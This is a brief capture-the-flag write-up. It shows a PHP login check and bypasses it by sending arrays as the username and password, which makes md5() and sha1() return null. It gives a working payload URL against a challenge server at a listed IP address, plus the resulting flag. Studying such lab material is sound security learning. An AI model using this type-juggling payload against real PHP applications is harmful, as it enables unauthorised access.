<?php error_reporting(0); $flag = 'flag{test}'; if (isset($_GET['username']) and isset($_GET['password'])) { if ($_GET['username'] == $_GET['password']) print 'Your password can not be your username.'; else if (md5($_GET['username']) === md5($_GET['password'])) die('Flag: '.$flag); else print 'Invalid password'; } ?>
username and password can not be the same, but again the same md5
Loopholes md5 function, does not recognize md5 array, return null, can be bypassed
The same functions are also vulnerable to this issue sha1
payload
http://123.206.87.240:9009/18.php?username[]=1&password[]=2
get
Flag: flag{bugk1u-ad8-3dsa-2}